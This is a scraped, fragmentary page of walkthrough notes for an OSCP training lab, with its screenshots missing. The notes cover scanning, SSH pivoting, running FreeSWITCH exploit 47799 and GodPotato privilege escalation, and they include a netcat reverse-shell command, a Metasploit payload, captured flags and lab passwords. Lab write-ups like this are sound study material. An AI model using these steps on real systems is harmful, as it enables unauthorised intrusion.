0% found this document useful (0 votes)

1K views15 pages

Challenge Lab OSCP B

The document outlines a series of steps for a penetration testing challenge involving the identification of usernames and flags. It details the use of tools like naabu.exe, exploitDB, and Metasploit to exploit vulnerabilities and gain access to user accounts. The final goal is to retrieve specific flags associated with the users identified during the process.

Uploaded by

cko048

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

1K views15 pages

Challenge Lab OSCP B

Uploaded by

cko048

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

You are on page 1/ 15

Challenge Lab OSCP B

Identify username: john and kiero

Flag: c5a5f996c0873184369b7637e4b15c0c (149)

Diamond1

Dolphin1
Download naabu.exe
Unzip file:

Copy to ssh server:

Run naabu.exe to scan MS02 (148) and DC01 (146)

MS02:
DC01:

ssh -D 9050 [email protected]

Open new Kali terminal:

SeImpersonatePrivilege Enabled
Flag: e09ab3030379b290eb67a3e8dba972f6 (146)
192.168.X.151

Search freeswitch from exploitDB

Download 47799.txt

searchsploit -m 47799

change format from txt to py

python 47799.py 192.168.X.151 whoami

The user is chris

GodPotato -cmd "C:\Users\chris\Desktop\nc.exe -t -e C:\Windows\
System32\cmd.exe 192.168.45.185 9001”

Set python server:

Create the msf.exe file

Download the msf.exe from local host

After it, connected the Metasploit and access to 192.168.X.151

Since we knew the user is Chris, direct to chris account and find the
flag

Flag: 561244b0031f4dae883069dc4c4f8848

3.challenge3 Skylark
No ratings yet
3.challenge3 Skylark
45 pages
Barracuda Standalone
100% (1)
Barracuda Standalone
6 pages
Nagoya Proving Grounds Practice Walkthrough Medium PDF
100% (1)
Nagoya Proving Grounds Practice Walkthrough Medium PDF
20 pages
Contenido
No ratings yet
Contenido
21 pages
Adispy Oscp 6 Ad Sets 2023
No ratings yet
Adispy Oscp 6 Ad Sets 2023
24 pages
Medtech Notes - MD
No ratings yet
Medtech Notes - MD
8 pages
Secura
No ratings yet
Secura
15 pages
Med Tech
100% (1)
Med Tech
37 pages
4 Challenge4-OSCPA
No ratings yet
4 Challenge4-OSCPA
13 pages
Gmsadump
No ratings yet
Gmsadump
2 pages
Writeup 1
No ratings yet
Writeup 1
4 pages
Pascha Mobile Mouse Server 9099 Metasploit Privilege Escalation Overwriting Service Windows
100% (2)
Pascha Mobile Mouse Server 9099 Metasploit Privilege Escalation Overwriting Service Windows
5 pages
Cybernetics PDF
No ratings yet
Cybernetics PDF
155 pages
OSCP Challenge 2 - Relia
No ratings yet
OSCP Challenge 2 - Relia
57 pages
Vulnerability Assessment - JustusKoech
No ratings yet
Vulnerability Assessment - JustusKoech
16 pages
Lab Report
No ratings yet
Lab Report
10 pages
102 - OSCP (Chlorine) Hide01.ir
0% (1)
102 - OSCP (Chlorine) Hide01.ir
2 pages
OSED Exam Report
No ratings yet
OSED Exam Report
5 pages
89 - Esm
No ratings yet
89 - Esm
10 pages
OSCPB
100% (1)
OSCPB
22 pages
Dog Port Scan: - SV - A - T4 - o
No ratings yet
Dog Port Scan: - SV - A - T4 - o
9 pages
OSCP
No ratings yet
OSCP
86 pages
HTB Scienceontheweb Net Rastalabs Flag6 7 8 - Compress
0% (1)
HTB Scienceontheweb Net Rastalabs Flag6 7 8 - Compress
6 pages
Backfire
No ratings yet
Backfire
15 pages
Adispy OSCP MS01 v2mssql AD Set 2023
No ratings yet
Adispy OSCP MS01 v2mssql AD Set 2023
7 pages
CRTO v1
No ratings yet
CRTO v1
6 pages
MS01
No ratings yet
MS01
28 pages
OSCP - 2022 - Standalones - October - 19 Machines
No ratings yet
OSCP - 2022 - Standalones - October - 19 Machines
32 pages
Akount & Logicbomb
No ratings yet
Akount & Logicbomb
25 pages
HTB Oscp Review
No ratings yet
HTB Oscp Review
18 pages
Eureka
No ratings yet
Eureka
3 pages
OSWE Exam Report
No ratings yet
OSWE Exam Report
33 pages
Dante Guide PDF
100% (1)
Dante Guide PDF
17 pages
CRTO Exam Req
No ratings yet
CRTO Exam Req
1 page
HTB CPTS Exam Report Template
No ratings yet
HTB CPTS Exam Report Template
24 pages
Half Writeup Haze
No ratings yet
Half Writeup Haze
22 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
52 pages
Burp Update
No ratings yet
Burp Update
26 pages
Prepare To BSCP
No ratings yet
Prepare To BSCP
2 pages
Rasta
No ratings yet
Rasta
5 pages
Auth by
No ratings yet
Auth by
19 pages
WAPTX v2 Report
100% (1)
WAPTX v2 Report
55 pages
CPTS PDF
50% (2)
CPTS PDF
30 pages
OSCP Quals33
100% (1)
OSCP Quals33
48 pages
Sorcery
No ratings yet
Sorcery
4 pages
Documentation & Reporting
No ratings yet
Documentation & Reporting
15 pages
The Frizz
No ratings yet
The Frizz
33 pages
New Text Document
No ratings yet
New Text Document
2 pages
OSWA OS XXXXXX Exam Report
100% (1)
OSWA OS XXXXXX Exam Report
17 pages
Web App Penetration Testing Report
No ratings yet
Web App Penetration Testing Report
66 pages
Rasta Labs
No ratings yet
Rasta Labs
29 pages
EJPTv2 Examen Cheatsheet - Pdf.es - en
100% (1)
EJPTv2 Examen Cheatsheet - Pdf.es - en
29 pages
Vuln Hub
0% (1)
Vuln Hub
1 page
OSWE Exam Report
No ratings yet
OSWE Exam Report
5 pages
TryHackMe Writeups Couch at Main The Debarghya TryHackMe Writeups
No ratings yet
TryHackMe Writeups Couch at Main The Debarghya TryHackMe Writeups
5 pages

Challenge Lab OSCP B

Uploaded by

Challenge Lab OSCP B

Uploaded by

Challenge Lab OSCP B

Identify username: john and kiero

Flag: c5a5f996c0873184369b7637e4b15c0c (149)

Copy to ssh server:

Run naabu.exe to scan MS02 (148) and DC01 (146)

ssh -D 9050 [email protected]

Open new Kali terminal:

Search freeswitch from exploitDB

change format from txt to py

python 47799.py 192.168.X.151 whoami

The user is chris

Set python server:

Create the msf.exe file

Download the msf.exe from local host

You might also like